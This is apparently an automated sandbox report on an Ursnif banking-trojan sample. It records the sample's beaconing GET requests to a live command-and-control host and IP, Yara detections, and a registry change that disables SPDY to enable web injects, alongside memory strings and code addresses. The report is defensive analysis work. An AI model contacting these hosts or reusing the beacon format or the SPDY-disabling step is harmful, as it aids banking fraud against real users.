                    Source: global trafficHTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
                    Source: Joe Sandbox ViewIP Address: 185.251.90.253 185.251.90.253
                    Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P
                    Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/t
                    Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                    Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                    Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmpString found in binary or memory: http://crl.m5
                    Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
                    Disables SPDY (HTTP compression, likely to perform web injects)Show sources
                    Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,21_2_00E53276

                    System Summary:

                    barindex
                    Writes registry values via WMIShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E5725F21_2_00E5725F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E57E3021_2_00E57E30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E5175421_2_00E51754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0559357021_2_05593570
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05575C8821_2_05575C88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055710E621_2_055710E6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055790A121_2_055790A1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05587B5D21_2_05587B5D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05584B1F21_2_05584B1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055843B921_2_055843B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0557FBA921_2_0557FBA9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0557423D21_2_0557423D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558DAED21_2_0558DAED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055952A021_2_055952A0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EE95C31_2_000002174F3EE95C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FB94831_2_000002174F3FB948
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FB23031_2_000002174F3FB230
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F06B431_2_000002174F3F06B4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F6EA031_2_000002174F3F6EA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E668431_2_000002174F3E6684
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D76F431_2_000002174F3D76F4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F5ED831_2_000002174F3F5ED8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EC6C431_2_000002174F3EC6C4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E2EC031_2_000002174F3E2EC0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F2EF831_2_000002174F3F2EF8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E559C31_2_000002174F3E559C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E1DF431_2_000002174F3E1DF4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F4DE031_2_000002174F3F4DE0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E5DBC31_2_000002174F3E5DBC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D361031_2_000002174F3D3610
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D74A431_2_000002174F3D74A4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E448431_2_000002174F3E4484
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E950031_2_000002174F3E9500
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D4B6031_2_000002174F3D4B60
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F435431_2_000002174F3F4354
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D134831_2_000002174F3D1348
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E834031_2_000002174F3E8340
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FA3A431_2_000002174F3FA3A4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F4BA031_2_000002174F3F4BA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3DABDC31_2_000002174F3DABDC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F940831_2_000002174F3F9408
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F340031_2_000002174F3F3400
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EBA7431_2_000002174F3EBA74
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D9AD831_2_000002174F3D9AD8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3ED32831_2_000002174F3ED328
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F730C31_2_000002174F3F730C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F516431_2_000002174F3F5164
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E116431_2_000002174F3E1164
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E415031_2_000002174F3E4150
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D000031_2_000002174F3D0000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D213831_2_000002174F3D2138
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EA9F831_2_000002174F3EA9F8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E70C831_2_000002174F3E70C8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F88B831_2_000002174F3F88B8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E012431_2_000002174F3E0124
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D90FC31_2_000002174F3D90FC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F40479631_2_000002174F404796
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EF7B431_2_000002174F3EF7B4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EA79031_2_000002174F3EA790
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E782031_2_000002174F3E7820
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D100031_2_000002174F3D1000
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DB94838_2_000DB948
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CE95C38_2_000CE95C
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DB23038_2_000DB230
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D340038_2_000D3400
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B100038_2_000B1000
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C782038_2_000C7820
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D88B838_2_000D88B8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C70C838_2_000C70C8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B90FC38_2_000B90FC
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C012438_2_000C0124
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B213838_2_000B2138
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C694438_2_000C6944
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C415038_2_000C4150
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C116438_2_000C1164
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D516438_2_000D5164
